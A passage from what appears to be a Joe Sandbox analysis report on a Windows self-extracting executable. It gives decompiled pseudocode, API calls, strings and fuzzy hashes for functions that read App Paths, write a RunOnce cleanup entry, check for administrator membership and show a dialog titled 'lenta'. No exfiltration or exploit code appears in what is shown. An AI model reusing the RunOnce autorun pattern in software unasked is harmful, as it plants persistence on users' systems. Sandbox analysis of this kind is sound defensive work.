                                                                                                                                                                                                                                                0x00102837
                                                                                                                                                                                                                                                0x0010285a
                                                                                                                                                                                                                                                0x0010285c
                                                                                                                                                                                                                                                0x00102865
                                                                                                                                                                                                                                                0x00102892
                                                                                                                                                                                                                                                0x00102895
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x00102867
                                                                                                                                                                                                                                                0x00102878
                                                                                                                                                                                                                                                0x0010288c
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x0010287a
                                                                                                                                                                                                                                                0x00102880
                                                                                                                                                                                                                                                0x00102885
                                                                                                                                                                                                                                                0x00102897
                                                                                                                                                                                                                                                0x00102899
                                                                                                                                                                                                                                                0x00102899
                                                                                                                                                                                                                                                0x00102878
                                                                                                                                                                                                                                                0x00102865
                                                                                                                                                                                                                                                0x001028a0
                                                                                                                                                                                                                                                0x001028bf
                                                                                                                                                                                                                                                0x001028c1
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x001028c1
                                                                                                                                                                                                                                                0x00102831
                                                                                                                                                                                                                                                0x001027dd
                                                                                                                                                                                                                                                0x001027d5
                                                                                                                                                                                                                                                0x001028e5

                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                • CharUpperA.USER32(B5A2E1BC,00000000,00000000,00000000), ref: 001027A8
                                                                                                                                                                                                                                                • CharNextA.USER32(0000054D), ref: 001027B5
                                                                                                                                                                                                                                                • CharNextA.USER32(00000000), ref: 001027BC
                                                                                                                                                                                                                                                • RegOpenKeyExA.ADVAPI32(80000002,?,00000000,00020019,?,?,?,Software\Microsoft\Windows\CurrentVersion\App Paths), ref: 00102829
                                                                                                                                                                                                                                                • RegQueryValueExA.ADVAPI32(?,00101140,00000000,?,-00000005,?,?,Software\Microsoft\Windows\CurrentVersion\App Paths), ref: 00102852
                                                                                                                                                                                                                                                • ExpandEnvironmentStringsA.KERNEL32(-00000005,?,00000104,?,Software\Microsoft\Windows\CurrentVersion\App Paths), ref: 00102870
                                                                                                                                                                                                                                                • RegCloseKey.ADVAPI32(?,?,Software\Microsoft\Windows\CurrentVersion\App Paths), ref: 001028A0
                                                                                                                                                                                                                                                • GetWindowsDirectoryA.KERNEL32(-00000005,00000104), ref: 001028AA
                                                                                                                                                                                                                                                • GetSystemDirectoryA.KERNEL32 ref: 001028B9
                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                • Software\Microsoft\Windows\CurrentVersion\App Paths, xrefs: 001027E4
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000002.00000002.382576987.0000000000101000.00000020.00000001.01000000.00000005.sdmp, Offset: 00100000, based on PE: true
                                                                                                                                                                                                                                                • Associated: 00000002.00000002.382559810.0000000000100000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000002.00000002.382590761.0000000000108000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000002.00000002.382603847.000000000010A000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000002.00000002.382603847.000000000010C000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_2_2_100000_gDR79xP.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: Char$DirectoryNext$CloseEnvironmentExpandOpenQueryStringsSystemUpperValueWindows
                                                                                                                                                                                                                                                • String ID: Software\Microsoft\Windows\CurrentVersion\App Paths
                                                                                                                                                                                                                                                • API String ID: 2659952014-2428544900
                                                                                                                                                                                                                                                • Opcode ID: 70c25be2ad3f0a00592cbc59b763bc062576e144fc531a94817abb41b185f94c
                                                                                                                                                                                                                                                • Instruction ID: 8822f4695772b1f8b47b88f45909d4cd982ffe31ce63c0b16052ab51d3839ccf
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 70c25be2ad3f0a00592cbc59b763bc062576e144fc531a94817abb41b185f94c
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 6B41B675A0012CAFDB249B649C49AEA77BDEF55700F4480A6F6C5D2184DBF04EC58FA1
                                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                Function 00102267 Relevance: 17.6, APIs: 6, Strings: 4, Instructions: 88registryCOMMON
                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                C-Code - Quality: 62%
                                                                                                                                                                                                                                                			E00102267() {
				signed int _v8;
				char _v268;
				char _v836;
				void* _v840;
				int _v844;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t19;
				intOrPtr _t33;
				void* _t38;
				intOrPtr* _t42;
				void* _t45;
				void* _t47;
				void* _t49;
				signed int _t51;

				_t19 =  *0x108004; // 0xb5a2e1bc
				_t20 = _t19 ^ _t51;
				_v8 = _t19 ^ _t51;
				if( *0x108530 != 0) {
					_push(_t49);
					if(RegOpenKeyExA(0x80000002, "Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", 0, 0x2001f,  &_v840) == 0) {
						_push(_t38);
						_v844 = 0x238;
						if(RegQueryValueExA(_v840, ?str?, 0, 0,  &_v836,  &_v844) == 0) {
							_push(_t47);
							memset( &_v268, 0, 0x104);
							if(GetSystemDirectoryA( &_v268, 0x104) != 0) {
								E0010658A( &_v268, 0x104, 0x101140);
							}
							_push("C:\Users\hardz\AppData\Local\Temp\IXP002.TMP\");
							E0010171E( &_v836, 0x238, "rundll32.exe %sadvpack.dll,DelNodeRunDLL32 \"%s\"",  &_v268);
							_t42 =  &_v836;
							_t45 = _t42 + 1;
							_pop(_t47);
							do {
								_t33 =  *_t42;
								_t42 = _t42 + 1;
							} while (_t33 != 0);
							RegSetValueExA(_v840, "wextract_cleanup2", 0, 1,  &_v836, _t42 - _t45 + 1);
						}
						_t20 = RegCloseKey(_v840);
						_pop(_t38);
					}
					_pop(_t49);
				}
				return E00106CE0(_t20, _t38, _v8 ^ _t51, _t45, _t47, _t49);
			}



















                                                                                                                                                                                                                                                0x00102272
                                                                                                                                                                                                                                                0x00102277
                                                                                                                                                                                                                                                0x00102279
                                                                                                                                                                                                                                                0x00102283
                                                                                                                                                                                                                                                0x00102289
                                                                                                                                                                                                                                                0x001022ab
                                                                                                                                                                                                                                                0x001022b1
                                                                                                                                                                                                                                                0x001022c4
                                                                                                                                                                                                                                                0x001022e0
                                                                                                                                                                                                                                                0x001022e6
                                                                                                                                                                                                                                                0x001022f5
                                                                                                                                                                                                                                                0x0010230d
                                                                                                                                                                                                                                                0x0010231c
                                                                                                                                                                                                                                                0x0010231c
                                                                                                                                                                                                                                                0x00102321
                                                                                                                                                                                                                                                0x0010233a
                                                                                                                                                                                                                                                0x00102342
                                                                                                                                                                                                                                                0x00102348
                                                                                                                                                                                                                                                0x0010234b
                                                                                                                                                                                                                                                0x0010234c
                                                                                                                                                                                                                                                0x0010234c
                                                                                                                                                                                                                                                0x0010234e
                                                                                                                                                                                                                                                0x0010234f
                                                                                                                                                                                                                                                0x0010236e
                                                                                                                                                                                                                                                0x0010236e
                                                                                                                                                                                                                                                0x0010237a
                                                                                                                                                                                                                                                0x00102380
                                                                                                                                                                                                                                                0x00102380
                                                                                                                                                                                                                                                0x00102381
                                                                                                                                                                                                                                                0x00102381
                                                                                                                                                                                                                                                0x0010238f

                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                • RegOpenKeyExA.ADVAPI32(80000002,Software\Microsoft\Windows\CurrentVersion\RunOnce,00000000,0002001F,?,00000001), ref: 001022A3
                                                                                                                                                                                                                                                • RegQueryValueExA.ADVAPI32(?,wextract_cleanup2,00000000,00000000,?,?,00000001), ref: 001022D8
                                                                                                                                                                                                                                                • memset.MSVCRT ref: 001022F5
                                                                                                                                                                                                                                                • GetSystemDirectoryA.KERNEL32 ref: 00102305
                                                                                                                                                                                                                                                • RegSetValueExA.ADVAPI32(?,wextract_cleanup2,00000000,00000001,?,?,?,?,?,?,?,?,?), ref: 0010236E
                                                                                                                                                                                                                                                • RegCloseKey.ADVAPI32(?), ref: 0010237A
                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                • rundll32.exe %sadvpack.dll,DelNodeRunDLL32 "%s", xrefs: 0010232D
                                                                                                                                                                                                                                                • Software\Microsoft\Windows\CurrentVersion\RunOnce, xrefs: 00102299
                                                                                                                                                                                                                                                • wextract_cleanup2, xrefs: 0010227C, 001022CD, 00102363
                                                                                                                                                                                                                                                • C:\Users\user\AppData\Local\Temp\IXP002.TMP\, xrefs: 00102321
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000002.00000002.382576987.0000000000101000.00000020.00000001.01000000.00000005.sdmp, Offset: 00100000, based on PE: true
                                                                                                                                                                                                                                                • Associated: 00000002.00000002.382559810.0000000000100000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000002.00000002.382590761.0000000000108000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000002.00000002.382603847.000000000010A000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000002.00000002.382603847.000000000010C000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_2_2_100000_gDR79xP.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: Value$CloseDirectoryOpenQuerySystemmemset
                                                                                                                                                                                                                                                • String ID: C:\Users\user\AppData\Local\Temp\IXP002.TMP\$Software\Microsoft\Windows\CurrentVersion\RunOnce$rundll32.exe %sadvpack.dll,DelNodeRunDLL32 "%s"$wextract_cleanup2
                                                                                                                                                                                                                                                • API String ID: 3027380567-2274915764
                                                                                                                                                                                                                                                • Opcode ID: 9c6148e652f518d719b31321bfa9b0f6c2e43242ff968d998976782c9d83982f
                                                                                                                                                                                                                                                • Instruction ID: 433f896abad19542dca4e08bbcd525a00c8b1f2a07afab91eeca5aa5089aea52
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 9c6148e652f518d719b31321bfa9b0f6c2e43242ff968d998976782c9d83982f
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: C1319871A002186BDB219B55DC49FDB7B7CEF54740F4001A5F5CDAA091DBF56B88CA50
                                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                Function 00103100 Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 70windowCOMMON
                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                C-Code - Quality: 87%
                                                                                                                                                                                                                                                			E00103100(struct HWND__* _a4, intOrPtr _a8, intOrPtr _a12) {
				void* _t8;
				void* _t11;
				void* _t15;
				struct HWND__* _t16;
				struct HWND__* _t33;
				struct HWND__* _t34;

				_t8 = _a8 - 0xf;
				if(_t8 == 0) {
					if( *0x108590 == 0) {
						SendDlgItemMessageA(_a4, 0x834, 0xb1, 0xffffffff, 0);
						 *0x108590 = 1;
					}
					L13:
					return 0;
				}
				_t11 = _t8 - 1;
				if(_t11 == 0) {
					L7:
					_push(0);
					L8:
					EndDialog(_a4, ??);
					L9:
					return 1;
				}
				_t15 = _t11 - 0x100;
				if(_t15 == 0) {
					_t16 = GetDesktopWindow();
					_t33 = _a4;
					E001043D0(_t33, _t16);
					SetDlgItemTextA(_t33, 0x834,  *0x108d4c);
					SetWindowTextA(_t33, "lenta");
					SetForegroundWindow(_t33);
					_t34 = GetDlgItem(_t33, 0x834);
					 *0x1088b8 = GetWindowLongA(_t34, 0xfffffffc);
					SetWindowLongA(_t34, 0xfffffffc, E001030C0);
					return 1;
				}
				if(_t15 != 1) {
					goto L13;
				}
				if(_a12 != 6) {
					if(_a12 != 7) {
						goto L9;
					}
					goto L7;
				}
				_push(1);
				goto L8;
			}









                                                                                                                                                                                                                                                0x00103108
                                                                                                                                                                                                                                                0x0010310b
                                                                                                                                                                                                                                                0x001031b7
                                                                                                                                                                                                                                                0x001031ca
                                                                                                                                                                                                                                                0x001031d0
                                                                                                                                                                                                                                                0x001031d0
                                                                                                                                                                                                                                                0x001031da
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x001031da
                                                                                                                                                                                                                                                0x00103111
                                                                                                                                                                                                                                                0x00103114
                                                                                                                                                                                                                                                0x00103136
                                                                                                                                                                                                                                                0x00103136
                                                                                                                                                                                                                                                0x00103138
                                                                                                                                                                                                                                                0x0010313b
                                                                                                                                                                                                                                                0x00103141
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x00103143
                                                                                                                                                                                                                                                0x00103116
                                                                                                                                                                                                                                                0x0010311b
                                                                                                                                                                                                                                                0x0010314b
                                                                                                                                                                                                                                                0x00103151
                                                                                                                                                                                                                                                0x00103158
                                                                                                                                                                                                                                                0x0010316a
                                                                                                                                                                                                                                                0x00103176
                                                                                                                                                                                                                                                0x0010317d
                                                                                                                                                                                                                                                0x0010318b
                                                                                                                                                                                                                                                0x0010319e
                                                                                                                                                                                                                                                0x001031a3
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x001031ad
                                                                                                                                                                                                                                                0x00103120
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x0010312a
                                                                                                                                                                                                                                                0x00103134
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x00103134
                                                                                                                                                                                                                                                0x0010312c
                                                                                                                                                                                                                                                0x00000000

                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                • EndDialog.USER32(?,00000000), ref: 0010313B
                                                                                                                                                                                                                                                • GetDesktopWindow.USER32 ref: 0010314B
                                                                                                                                                                                                                                                • SetDlgItemTextA.USER32(?,00000834), ref: 0010316A
                                                                                                                                                                                                                                                • SetWindowTextA.USER32(?,lenta), ref: 00103176
                                                                                                                                                                                                                                                • SetForegroundWindow.USER32(?), ref: 0010317D
                                                                                                                                                                                                                                                • GetDlgItem.USER32(?,00000834), ref: 00103185
                                                                                                                                                                                                                                                • GetWindowLongA.USER32(00000000,000000FC), ref: 00103190
                                                                                                                                                                                                                                                • SetWindowLongA.USER32(00000000,000000FC,001030C0), ref: 001031A3
                                                                                                                                                                                                                                                • SendDlgItemMessageA.USER32(?,00000834,000000B1,000000FF,00000000), ref: 001031CA
                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000002.00000002.382576987.0000000000101000.00000020.00000001.01000000.00000005.sdmp, Offset: 00100000, based on PE: true
                                                                                                                                                                                                                                                • Associated: 00000002.00000002.382559810.0000000000100000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000002.00000002.382590761.0000000000108000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000002.00000002.382603847.000000000010A000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000002.00000002.382603847.000000000010C000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_2_2_100000_gDR79xP.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: Window$Item$LongText$DesktopDialogForegroundMessageSend
                                                                                                                                                                                                                                                • String ID: lenta
                                                                                                                                                                                                                                                • API String ID: 3785188418-2780258678
                                                                                                                                                                                                                                                • Opcode ID: 33ed0869a18b84c63a6caea1828f1e683c503f5894ac7ef8f5772e8d9001455c
                                                                                                                                                                                                                                                • Instruction ID: d8cf4d62395dfd052b1b1f4ca4e710605cda77ac628705ccafaddcd89653b63b
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 33ed0869a18b84c63a6caea1828f1e683c503f5894ac7ef8f5772e8d9001455c
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 3211D331248311BBDB116F24AC0CF9A3A68FF5E720F504620F9E5919E0DBF096C1C782
                                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                Function 001018A3 Relevance: 16.6, APIs: 11, Instructions: 112memoryCOMMON
                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                C-Code - Quality: 91%
                                                                                                                                                                                                                                                			E001018A3(void* __edx, void* __esi) {
				signed int _v8;
				short _v12;
				struct _SID_IDENTIFIER_AUTHORITY _v16;
				char _v20;
				long _v24;
				void* _v28;
				void* _v32;
				void* __ebx;
				void* __edi;
				signed int _t23;
				long _t45;
				void* _t49;
				int _t50;
				void* _t52;
				signed int _t53;

				_t51 = __esi;
				_t49 = __edx;
				_t23 =  *0x108004; // 0xb5a2e1bc
				_v8 = _t23 ^ _t53;
				_t25 =  *0x108128; // 0x2
				_t45 = 0;
				_v12 = 0x500;
				_t50 = 2;
				_v16.Value = 0;
				_v20 = 0;
				if(_t25 != _t50) {
					L20:
					return E00106CE0(_t25, _t45, _v8 ^ _t53, _t49, _t50, _t51);
				}
				if(E001017EE( &_v20) != 0) {
					_t25 = _v20;
					if(_v20 != 0) {
						 *0x108128 = 1;
					}
					goto L20;
				}
				if(OpenProcessToken(GetCurrentProcess(), 8,  &_v28) == 0) {
					goto L20;
				}
				if(GetTokenInformation(_v28, _t50, 0, 0,  &_v24) != 0 || GetLastError() != 0x7a) {
					L17:
					CloseHandle(_v28);
					_t25 = _v20;
					goto L20;
				} else {
					_push(__esi);
					_t52 = LocalAlloc(0, _v24);
					if(_t52 == 0) {
						L16:
						_pop(_t51);
						goto L17;
					}
					if(GetTokenInformation(_v28, _t50, _t52, _v24,  &_v24) == 0 || AllocateAndInitializeSid( &_v16, _t50, 0x20, 0x220, 0, 0, 0, 0, 0, 0,  &_v32) == 0) {
						L15:
						LocalFree(_t52);
						goto L16;
					} else {
						if( *_t52 <= 0) {
							L14:
							FreeSid(_v32);
							goto L15;
						}
						_t15 = _t52 + 4; // 0x4
						_t50 = _t15;
						while(EqualSid( *_t50, _v32) == 0) {
							_t45 = _t45 + 1;
							_t50 = _t50 + 8;
							if(_t45 <  *_t52) {
								continue;
							}
							goto L14;
						}
						 *0x108128 = 1;
						_v20 = 1;
						goto L14;
					}
				}
			}


















                                                                                                                                                                                                                                                0x001018a3
                                                                                                                                                                                                                                                0x001018a3
                                                                                                                                                                                                                                                0x001018ab
                                                                                                                                                                                                                                                0x001018b2
                                                                                                                                                                                                                                                0x001018b5
                                                                                                                                                                                                                                                0x001018be
                                                                                                                                                                                                                                                0x001018c0
                                                                                                                                                                                                                                                0x001018c6
                                                                                                                                                                                                                                                0x001018c7
                                                                                                                                                                                                                                                0x001018ca
                                                                                                                                                                                                                                                0x001018cf
                                                                                                                                                                                                                                                0x001019c9
                                                                                                                                                                                                                                                0x001019d8
                                                                                                                                                                                                                                                0x001019d8
                                                                                                                                                                                                                                                0x001018df
                                                                                                                                                                                                                                                0x001019b8
                                                                                                                                                                                                                                                0x001019bd
                                                                                                                                                                                                                                                0x001019bf
                                                                                                                                                                                                                                                0x001019bf
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x001019bd
                                                                                                                                                                                                                                                0x001018fa
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x00101912
                                                                                                                                                                                                                                                0x001019aa
                                                                                                                                                                                                                                                0x001019ad
                                                                                                                                                                                                                                                0x001019b3
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x00101927
                                                                                                                                                                                                                                                0x00101927
                                                                                                                                                                                                                                                0x00101932
                                                                                                                                                                                                                                                0x00101936
                                                                                                                                                                                                                                                0x001019a9
                                                                                                                                                                                                                                                0x001019a9
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x001019a9
                                                                                                                                                                                                                                                0x0010194c
                                                                                                                                                                                                                                                0x001019a2
                                                                                                                                                                                                                                                0x001019a3
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x0010196e
                                                                                                                                                                                                                                                0x00101970
                                                                                                                                                                                                                                                0x00101999
                                                                                                                                                                                                                                                0x0010199c
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x0010199c
                                                                                                                                                                                                                                                0x00101972
                                                                                                                                                                                                                                                0x00101972
                                                                                                                                                                                                                                                0x00101975
                                                                                                                                                                                                                                                0x00101984
                                                                                                                                                                                                                                                0x00101985
                                                                                                                                                                                                                                                0x0010198a
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x0010198c
                                                                                                                                                                                                                                                0x00101991
                                                                                                                                                                                                                                                0x00101996
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x00101996
                                                                                                                                                                                                                                                0x0010194c

                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                  • Part of subcall function 001017EE: LoadLibraryA.KERNEL32(advapi32.dll,00000002,?,00000000,?,?,?,001018DD), ref: 0010181A
                                                                                                                                                                                                                                                  • Part of subcall function 001017EE: GetProcAddress.KERNEL32(00000000,CheckTokenMembership), ref: 0010182C
                                                                                                                                                                                                                                                  • Part of subcall function 001017EE: AllocateAndInitializeSid.ADVAPI32(001018DD,00000002,00000020,00000220,00000000,00000000,00000000,00000000,00000000,00000000,?,?,?,?,001018DD), ref: 00101855
                                                                                                                                                                                                                                                  • Part of subcall function 001017EE: FreeSid.ADVAPI32(?,?,?,?,001018DD), ref: 00101883
                                                                                                                                                                                                                                                  • Part of subcall function 001017EE: FreeLibrary.KERNEL32(00000000,?,?,?,001018DD), ref: 0010188A
                                                                                                                                                                                                                                                • GetCurrentProcess.KERNEL32(00000008,?,00000000,00000001), ref: 001018EB
                                                                                                                                                                                                                                                • OpenProcessToken.ADVAPI32(00000000), ref: 001018F2
                                                                                                                                                                                                                                                • GetTokenInformation.ADVAPI32(?,00000002,00000000,00000000,?), ref: 0010190A
                                                                                                                                                                                                                                                • GetLastError.KERNEL32 ref: 00101918
                                                                                                                                                                                                                                                • LocalAlloc.KERNEL32(00000000,?,?), ref: 0010192C
                                                                                                                                                                                                                                                • GetTokenInformation.ADVAPI32(?,00000002,00000000,?,?), ref: 00101944
                                                                                                                                                                                                                                                • AllocateAndInitializeSid.ADVAPI32(?,00000002,00000020,00000220,00000000,00000000,00000000,00000000,00000000,00000000,?), ref: 00101964
                                                                                                                                                                                                                                                • EqualSid.ADVAPI32(00000004,?), ref: 0010197A
                                                                                                                                                                                                                                                • FreeSid.ADVAPI32(?), ref: 0010199C
                                                                                                                                                                                                                                                • LocalFree.KERNEL32(00000000), ref: 001019A3
                                                                                                                                                                                                                                                • CloseHandle.KERNEL32(?), ref: 001019AD
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000002.00000002.382576987.0000000000101000.00000020.00000001.01000000.00000005.sdmp, Offset: 00100000, based on PE: true
                                                                                                                                                                                                                                                • Associated: 00000002.00000002.382559810.0000000000100000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000002.00000002.382590761.0000000000108000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000002.00000002.382603847.000000000010A000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000002.00000002.382603847.000000000010C000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_2_2_100000_gDR79xP.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: Free$Token$AllocateInformationInitializeLibraryLocalProcess$AddressAllocCloseCurrentEqualErrorHandleLastLoadOpenProc
                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                • API String ID: 2168512254-0
                                                                                                                                                                                                                                                • Opcode ID: 862cf26e4d75eb8e9f78b1aa2cb64902e0c90924c229fb3eadf064705b82af3a
                                                                                                                                                                                                                                                • Instruction ID: 71f197cd2dacc50e5ef603e29b0e3410f7e3a3109d0bd54e9a052b61022a5d39
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 862cf26e4d75eb8e9f78b1aa2cb64902e0c90924c229fb3eadf064705b82af3a
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: B4311971A00209AFDB209FA5DC98AAFBBBCFF08708F500429F5C5D2194DBB49985CB61
                                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                Function 0010468F Relevance: 15.8, APIs: 7, Strings: 2, Instructions: 50COMMON
                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                C-Code - Quality: 82%
                                                                                                                                                                                                                                                			E0010468F(CHAR* __ecx, void* __edx, intOrPtr _a4) {
				long _t4;
				void* _t11;
				CHAR* _t14;
				void* _t15;
				long _t16;

				_t14 = __ecx;
				_t11 = __edx;
				_t4 = SizeofResource(0, FindResourceA(0, __ecx, 0xa));
				_t16 = _t4;
				if(_t16 <= _a4 && _t11 != 0) {
					if(_t16 == 0) {
						L5:
						return 0;
					}
					_t15 = LockResource(LoadResource(0, FindResourceA(0, _t14, 0xa)));
					if(_t15 == 0) {
						goto L5;
					}
					__imp__memcpy_s(_t11, _a4, _t15, _t16);
					FreeResource(_t15);
					return _t16;
				}
				return _t4;
			}








                                                                                                                                                                                                                                                0x00104699
                                                                                                                                                                                                                                                0x0010469b
                                                                                                                                                                                                                                                0x001046a9
                                                                                                                                                                                                                                                0x001046af
                                                                                                                                                                                                                                                0x001046b4
                                                                                                                                                                                                                                                0x001046bc
                                                                                                                                                                                                                                                0x001046f9
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x001046f9
                                                                                                                                                                                                                                                0x001046d9
                                                                                                                                                                                                                                                0x001046dd
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x001046e5
                                                                                                                                                                                                                                                0x001046ef
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x001046f5
                                                                                                                                                                                                                                                0x001046ff

                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                • FindResourceA.KERNEL32(00000000,TITLE,0000000A), ref: 001046A0
                                                                                                                                                                                                                                                • SizeofResource.KERNEL32(00000000,00000000,?,00102D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 001046A9
                                                                                                                                                                                                                                                • FindResourceA.KERNEL32(00000000,TITLE,0000000A), ref: 001046C3
                                                                                                                                                                                                                                                • LoadResource.KERNEL32(00000000,00000000,?,00102D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 001046CC
                                                                                                                                                                                                                                                • LockResource.KERNEL32(00000000,?,00102D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 001046D3
                                                                                                                                                                                                                                                • memcpy_s.MSVCRT ref: 001046E5
                                                                                                                                                                                                                                                • FreeResource.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,00000002,00000000), ref: 001046EF
                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000002.00000002.382576987.0000000000101000.00000020.00000001.01000000.00000005.sdmp, Offset: 00100000, based on PE: true
                                                                                                                                                                                                                                                • Associated: 00000002.00000002.382559810.0000000000100000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000002.00000002.382590761.0000000000108000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000002.00000002.382603847.000000000010A000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000002.00000002.382603847.000000000010C000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_2_2_100000_gDR79xP.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: Resource$Find$FreeLoadLockSizeofmemcpy_s
                                                                                                                                                                                                                                                • String ID: TITLE$lenta
                                                                                                                                                                                                                                                • API String ID: 3370778649-2035842925
                                                                                                                                                                                                                                                • Opcode ID: 00855235b43458b636981d157860279b1453c4d8776478fec9063ec2224a2ae4
                                                                                                                                                                                                                                                • Instruction ID: 67123f475013e0b396130bbc3266bd983d891f8a524a247f6db171c1c64f9375
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 00855235b43458b636981d157860279b1453c4d8776478fec9063ec2224a2ae4
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 3701A9B62443147BE31017A59C4DF6B7E2CDFC6F51F444014FBC997590DAF2988186B6
                                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                                Uniqueness Score: -1.00%

